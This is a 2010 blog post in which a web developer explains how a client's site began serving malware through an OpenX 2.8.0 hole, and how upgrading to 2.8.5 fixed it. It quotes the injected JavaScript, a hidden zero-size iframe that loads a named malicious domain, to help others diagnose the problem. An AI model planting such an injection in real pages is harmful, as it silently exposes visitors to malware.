Links

friends

jim gamble
tim - inhumanitees
solidus design
lisa koskela
tek
12ozProphet

projects

dubstep listening channel
my future garage blog
los banos trees
emp.cx - electronic music radio station & chat
mcr.eynolds.com & r.eynolds.com

politics

michigan liberal
david lagrand
fivethirtyeight

music

rachel mcreynolds
jack flash
ab & coconut brown

What part of my life would you like to see?
(Categories)


My Host

OpenX vulnerability leads to site hack and malware speading

A client of mine recently had his site start distributing malware due to an OpenX vulnerability. He was using 2.8.0.

Here’s how I found the problem and how I fixed it.

We first knew something was up when Firefox started displaying this warning when trying to access the site:

FIrefox Attack Site Warning

Using Google’s Webmaster tools to find out which pages were infected, I traced the problem to OpenX (instead of ExpressionEngine or other software) using the Web Developer plugin for Firefox. Here’s what worked for me:

  1. Install and enable the plugin and enable the toolbar
  2. Click on Information > View JavaScript (See photo below)
  3. Search on the page for “iframe”

image

And that’s how I found it, even though I couldn’t find the iframe in the source of any of the pages I looked at. In OpenX, the /www/delivery/ajs.php file dynamically creates javascipt that is loaded every time someone views an ad on your site. The malware-ridden javascript that was loading was at http://www.example.com/openx/www/delivery/ajs.php?zoneid=3&cb=20705736901&loc=http%3A//example.com/ where example.com is the domain name. The content that was added looked like this:

document.write('<iframe src="http://banan.uk.to/stats?counter=198" width=0 height=0></iframe>'); 

and was at the very top of the file.

banan.uk.to is the bad domain.

Upgrading OpenX to the most recent version, 2.8.5, eliminated the vulnerability and removed the iframe from the site’s javascript.

I hope this helps someone. Let me know in the comments if you have questions.

Edit 9/20/2010: After you upgrade OpenX, or as part of the upgrade, make sure to clear your ad cache. You can safely delete everything in openx/var/cache/, where “openx” is your OpenX installation.


Posted on Mar 26, 2010 - 01:03 PM

Comments:

Do you still have that problem after upgraded to 2.8.5?

By .(JavaScript must be enabled to view this email address) on Apr 03, 2010 - 07:56 PM

Comments:

Nope, upgrading to 2.8.5 eliminated the problem.

By .(JavaScript must be enabled to view this email address) on Apr 05, 2010 - 03:02 AM

Comments:

I get this same warning all of the time.  When I have time today, I ready through your tutorial and try to fix it on my computer.  I have bookmarked it for now.  There is nothing worse than getting a computer virus.

Thanks!
-Mike

By Facebook Analytics on Jan 24, 2011 - 12:02 PM

Leave A Comment!!

Please enter the letters or word you see in the image below:

Name:

Email:

Location:

URL:

Remember this information for next time

E-mail me about follow-up comments